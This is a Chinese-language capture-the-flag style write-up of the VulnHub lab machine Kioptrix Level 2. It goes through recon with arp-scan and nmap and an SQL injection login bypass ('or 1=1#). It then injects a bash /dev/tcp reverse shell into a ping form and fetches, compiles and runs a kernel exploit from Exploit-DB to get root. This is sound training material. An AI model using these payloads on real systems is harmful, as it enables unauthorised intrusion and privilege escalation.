为了去往别处

0%

vulnhub靶机练习之Kioptix Level 2

发表于 更新于 分类于
本文字数: 4.7k 阅读时长 ≈ 4 分钟

探测靶机

这台靶机的版本是centos4.5,要更改虚拟机文件CentOs4.5.vmx,将ethernet0.networkName = "Bridged"改成ethernet0.networkName = "Nat"。这样改了之后,我们就能探测到靶机IP了。

image.png
使用sudo arp-scan -l探测到靶机IP为192.168.80.16。

1
2
3
4
5
6
7
8
9
10
kali@kali:~$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1    00:50:56:c0:00:08       VMware, Inc.
192.168.80.2    00:50:56:fc:96:a7       VMware, Inc.
192.168.80.16   00:0c:29:6d:00:a3       VMware, Inc.
192.168.80.254  00:50:56:f8:e1:4e       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 4 responded

进一步扫描

使用sudo nmap -sS -T5 -Pn 192.168.80.16扫描,发现靶机开放的端口及服务如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kali@kali:~$ sudo nmap -sS -T5 -Pn 192.168.80.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:02 EST
Nmap scan report for 192.168.80.16
Host is up (0.0017s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:6D:00:A3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

nmap扫描详细信息,输入命令sudo nmap -A -T5 -sS 192.168.80.16

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:15 EST
Nmap scan report for 192.168.80.16
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-02-24T04:06:21+00:00; -2h09m35s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:6D:00:A3 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m35s

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.80.16

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.12 seconds

80端口可打开网页

我们用nmap扫描得到的信息是这个靶机存在http服务,于是在浏览器输入192.168.80.16,进入到web界面。
这个界面只需要输入用户名和密码即可登入,我们尝试一下万能密码。用户名:'or 1=1#,成功进入管理台。
image.png
image.png

利用提交功能反弹靶机shell

攻击机监听4444端口,web界面提交ping 192.168.80.14; bash -i >& /dev/tcp/192.168.80.14/4444 0>&1。反弹shell是用bash脚本bash -i >& /dev/tcp/192.168.80.14/4444 0>&1实现的。

1
2
3
4
5
6
7
8
9
kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.80.16: inverse host lookup failed: Unknown host
connect to [192.168.80.14] from (UNKNOWN) [192.168.80.16] 43719
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$ pwd
/var/www/html

image.png

  • 拓展知识(各种反弹shell的方法)
    参考

    找到内核漏洞

    从刚刚获取到的shell,我们看看靶机操作系统的内核信息,发现这个内核版本发行期是2007年,so old……
    1
    2
    bash-3.00$ uname -a
    Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
    于是在网上找到这个内核版本的漏洞利用方法。把这个漏洞利用脚本下载到攻击机:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    kali@kali:~$ wget https://www.exploit-db.com/download/9545
    --2020-02-24 01:41:53--  https://www.exploit-db.com/download/9545
    Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
    Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/txt]
    Saving to: ‘9545’

    9545                           [ <=>                                   ]   9.55K  --.-KB/s    in 0s      

    2020-02-24 01:41:58 (25.7 MB/s) - ‘9545’ saved [9783]
    攻击机:
    1
    2
    3
    4
    5
    kali@kali:~$ mv 9545 exploit.c
    kali@kali:~$ sudo mv exploit.c /var/www/html/ #将漏洞利用脚本放到web目录
    [sudo] password for kali: 
    kali@kali:~$ /etc/init.d/apache2 start #开启apache服务
    Starting apache2 (via systemctl): apache2.service.
    靶机shell从攻击机下载exploit:curl 192.168.80.14/exploit.c -o exploit.c。运行这个exp即可获取到靶机root权限。
    1
    2
    3
    4
    5
    6
    bash-3.00$ cd /tmp && id && curl 192.168.80.14/exploit.c -o exploit.c 2> /dev/null && gcc exploit.c && ./a.out
    uid=48(apache) gid=48(apache) groups=48(apache)
    exploit.c:376:28: warning: no newline at end of file
    sh: no job control in this shell
    sh-3.00# whoami
    root

    参考博文

    https://v3ded.github.io/ctf/kioptrix2.html

    总结

    从这台靶机练习,主要学习怎么反弹shell。遇到简单的web登录界面,首先尝试万能密码是否能登入系统。
    用户提交的内容是shell脚本(如:ping命令)这种情况,我们得明白;可以连接多个shell脚本,并且服务器会依次执行脚本。根据这个原理,我们把恶意脚本(如反弹shell的脚本)放到;后面,就可以欺骗服务器执行恶意脚本。
    靶机的操作系统版本较低时,在网上找相关版本的内核漏洞,进行利用。
-------------本文结束感谢您的阅读-------------